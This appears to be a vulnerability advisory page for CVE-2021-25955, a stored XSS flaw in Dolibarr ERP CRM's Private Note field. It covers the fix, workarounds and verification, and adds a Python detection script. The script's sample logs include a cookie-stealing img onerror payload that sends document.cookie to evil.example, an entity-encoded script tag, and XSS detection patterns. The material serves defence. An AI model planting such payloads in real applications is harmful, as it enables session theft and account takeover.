CVE-2021-25955
📋 TL;DR
Dolibarr ERP CRM versions 2.8.1 through 13.0.2 contain a stored cross-site scripting (XSS) vulnerability in the WYSIWYG Editor module, reachable through the Private Note field. An authenticated low-privileged user can store a script payload in the note; it executes in the browser of anyone who later views that note, which enables session theft and, from there, privilege escalation. The issue is particularly dangerous because administrators and managers are exactly the users who routinely review these records.
💻 Affected Systems
- Dolibarr ERP CRM
📦 What is this software?
Dolibarr is an open-source ERP and CRM web application written in PHP, developed and distributed by the Dolibarr project. It is typically deployed on a LAMP-style stack and accessed by many users with differing privilege levels, which is what makes a stored XSS in a shared record field impactful.
⚠️ Risk & Real-World Impact
Worst Case
Administrator account takeover via session ID theft, leading to full system compromise and privilege escalation across the Dolibarr instance.
Likely Case
A low-privileged user plants a payload that steals session cookies from administrators or other users who view the note, enabling unauthorized access and data exfiltration. If the session cookie carries the HttpOnly flag the script cannot read it directly, but it can still perform actions in the victim's authenticated context from within the page.
If Mitigated
Script execution is blocked by a Content Security Policy without 'unsafe-inline' or by server-side sanitization of the stored HTML; the impact is then limited to UI disruption from stray markup, without data theft.
🎯 Exploit Status
Exploitation requires an authenticated account with permission to edit private notes; no special tooling is needed beyond a browser or an HTTP client. The vulnerability details and the fixing commit are public.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 13.0.3 and later
Vendor Advisory: https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e
Restart Required: No
Instructions:
1. Upgrade Dolibarr to version 13.0.3 or later, the first release that contains the fix.
2. If an immediate upgrade is not possible, backport the fixing commit linked above onto your installed version.
3. Confirm the fix on a test record: a private note containing a harmless script payload must be stored with the active markup neutralised and must not execute when the note is viewed.
🔧 Temporary Workarounds
Disable WYSIWYG Editor for Private Notes
Disable the WYSIWYG editor for the Private Note field so that the field takes plain text input, and adjust the Dolibarr configuration accordingly.
Note that the editor is a client-side convenience: an attacker can still POST raw HTML to the same endpoint directly, so this reduces accidental exposure rather than closing the hole.
Implement Content Security Policy (CSP)
Add CSP headers that forbid inline script execution and restrict where scripts may be loaded from, for example by having the web server send the header Content-Security-Policy: script-src 'self' on Dolibarr responses.
A policy without 'unsafe-inline' blocks the inline script blocks and event-handler attributes that a stored payload relies on, but it will also block any inline scripts the application itself emits. Roll it out with Content-Security-Policy-Report-Only first and review the violation reports before enforcing.
🧯 If You Can't Patch
- Restrict the permission to edit member notes (the write path to /adherents/note.php) to trusted users; the payload is planted by whoever writes the note, not by those who read it.
- Add web application firewall (WAF) rules that block script-bearing constructs (script tags, javascript: URIs, on*= event handlers) in note fields. The WYSIWYG editor legitimately submits HTML, so rules that reject all markup will break normal use.
🔍 How to Verify
Check if Vulnerable:
On a non-production instance, save a private note containing a harmless marker payload (for example a script tag that only writes to the console) at /adherents/note.php?id=1 and then view the note; if the marker runs, or the raw script markup survives unchanged in the rendered page source, the instance is vulnerable.
Check Version:
Read the version from the administration panel, or from the file that defines the DOL_VERSION constant: grep DOL_VERSION /path/to/dolibarr/htdocs/filefunc.inc.php. Any value from 2.8.1 up to and including 13.0.2 is affected.
Verify Fix Applied:
Repeat the same injection test after patching; the payload must be neutralised on save or rendering and must not execute when the note is viewed.
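The version check above is easy to get wrong by hand (string comparison puts "9.0.0" after "13.0.2", and pre-release builds need a decision). The following is an added example, not code from the page or from the Dolibarr project: it extracts DOL_VERSION from the contents of htdocs/filefunc.inc.php and tests it against the affected range 2.8.1 to 13.0.2. The sample file contents are constructed, and treating a pre-release such as 13.0.3-beta as still affected is a conservative assumption, since the advisory names only release versions.

```python
import re

# Affected range from the advisory: 2.8.1 up to and including 13.0.2; 13.0.3 is
# the first fixed release. Tuples are (major, minor, patch, is_release) so that a
# pre-release such as "13.0.3-beta" sorts below the fixed 13.0.3 and is reported
# as affected (conservative assumption, see lead-in).
AFFECTED_MIN = (2, 8, 1, 1)
FIXED = (13, 0, 3, 1)

# Constructed stand-in for htdocs/filefunc.inc.php, the file that defines
# DOL_VERSION in a Dolibarr install.
SAMPLE_FILEFUNC = """<?php
// constructed sample, not the real file
if (!defined('DOL_VERSION')) {
    define('DOL_VERSION', '13.0.2');
}
"""

VERSION_RE = re.compile(
    r"""define\(\s*['"]DOL_VERSION['"]\s*,\s*['"]([^'"]+)['"]\s*\)"""
)


def extract_version(filefunc_text: str) -> str:
    """Pull the DOL_VERSION string out of the contents of filefunc.inc.php."""
    m = VERSION_RE.search(filefunc_text)
    if not m:
        raise ValueError("DOL_VERSION definition not found")
    return m.group(1)


def parse_version(version: str) -> tuple:
    """Turn '13.0.2' or '14.0.0-alpha' into a tuple that compares numerically."""
    core, _, suffix = version.partition("-")
    parts = [int(p) for p in core.split(".")]
    if not parts or len(parts) > 3:
        raise ValueError(f"unexpected version format: {version!r}")
    parts += [0] * (3 - len(parts))
    is_release = 0 if suffix else 1  # "-alpha", "-beta", ... sort below the release
    return (*parts, is_release)


def is_affected(version: str) -> bool:
    """True if the version falls inside the advisory's affected range."""
    v = parse_version(version)
    return AFFECTED_MIN <= v < FIXED


def assess(filefunc_text: str) -> dict:
    """Combine extraction and range check into one result for reporting."""
    version = extract_version(filefunc_text)
    return {"version": version, "affected": is_affected(version)}


if __name__ == "__main__":
    print(assess(SAMPLE_FILEFUNC))
```

To run it against a real install, read the file into `assess()` instead of the constructed sample; the same tuple logic also tells you whether a backported fix on an older branch should be verified by test rather than by version number alone.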
📡 Detection & Monitoring
Log Indicators:
- Unusual note creation/modification patterns
- Requests to /adherents/note.php with script-like payloads
Network Indicators:
- HTTP requests containing script tags or JavaScript in note parameters
SIEM Query (pseudo-syntax; this needs a log source that records request bodies, such as a WAF or a reverse proxy with body logging, because standard access logs omit POST bodies, and the body must be URL-decoded before matching since the editor submits encoded HTML; extend the match with event-handler attributes such as onerror= and onload=, which are the more common payload form):
source="web_logs" AND uri="/adherents/note.php" AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")
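The indicators above are easy to evade with URL or HTML-entity encoding, and a rule that flags every angle bracket will drown in the legitimate HTML the WYSIWYG editor sends. The following added example (not part of the page, not Dolibarr code) runs the detection over constructed request-body log records: it restricts itself to POSTs to /adherents/note.php, decodes the body, unescapes entities, and only alerts on script-bearing constructs in note fields. The JSON-lines format, the user field, and the parameter names action=setnote_private and note_private are assumptions made for the example.

```python
import html
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample records (JSON lines) from a reverse proxy or WAF configured
# to log POST bodies. Format and parameter names are assumptions for this
# example; plain Apache/nginx access logs do not contain request bodies.
SAMPLE_LOGS = [
    # benign rich-text note saved through the editor
    '{"ts":"2021-06-01T09:12:03Z","src":"10.0.0.5","method":"POST",'
    '"uri":"/adherents/note.php?id=1","user":"sales01",'
    '"body":"action=setnote_private&note_private=%3Cp%3ECalled+customer+about+invoice%3C%2Fp%3E"}',
    # cookie-stealing payload using an event handler, no <script> tag at all
    '{"ts":"2021-06-01T09:14:41Z","src":"10.0.0.9","method":"POST",'
    '"uri":"/adherents/note.php?id=1","user":"intern02",'
    '"body":"action=setnote_private&note_private=%3Cimg+src%3Dx+onerror%3D%22fetch(%27//evil.example/%3F%27%2Bdocument.cookie)%22%3E"}',
    # script tag hidden behind HTML entity encoding on top of URL encoding
    '{"ts":"2021-06-01T09:15:10Z","src":"10.0.0.9","method":"POST",'
    '"uri":"/adherents/note.php?id=7","user":"intern02",'
    '"body":"action=setnote_private&note_private=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B"}',
    # an admin merely viewing the note: a GET, never an injection
    '{"ts":"2021-06-01T09:20:00Z","src":"10.0.0.5","method":"GET",'
    '"uri":"/adherents/note.php?id=1","user":"admin","body":""}',
]

# Script-bearing constructs; ordinary tags such as <p> or <b> are not matched.
SCRIPT_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),  # onerror=, onload=, ...
    "active_embed": re.compile(r"<\s*(iframe|object|embed)\b", re.I),
}

MONITORED_PATHS = ("/adherents/note.php",)


def normalize(value: str) -> str:
    """parse_qs already undid URL encoding; unescape entities twice so a payload
    hidden behind one or two layers of entity encoding is still visible."""
    text = value
    for _ in range(2):
        text = html.unescape(text)
    return text


def detect(line: str, paths=MONITORED_PATHS):
    """Return an alert dict for a suspicious note write, else None."""
    rec = json.loads(line)
    if rec.get("method") != "POST":
        return None
    if urlsplit(rec.get("uri", "")).path not in paths:
        return None
    params = parse_qs(rec.get("body", ""), keep_blank_values=True)
    for name, values in params.items():
        if "note" not in name.lower():  # only note fields, not e.g. action=
            continue
        for value in values:
            text = normalize(value)
            hits = [label for label, rx in SCRIPT_PATTERNS.items() if rx.search(text)]
            if hits:
                return {
                    "ts": rec.get("ts"), "src": rec.get("src"),
                    "user": rec.get("user"), "uri": rec["uri"],
                    "field": name, "matched": hits,
                }
    return None


def scan(lines):
    """Run detect() over a batch of log lines and keep the alerts."""
    return [alert for alert in (detect(line) for line in lines) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(alert)
```

Two of the four constructed records alert, both from the same low-privileged account, and the benign rich-text note does not. Decoding before matching is what catches the entity-encoded variant; matching on event handlers is what catches the payload that never uses a script tag.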
🔗 References
- https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e
- https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955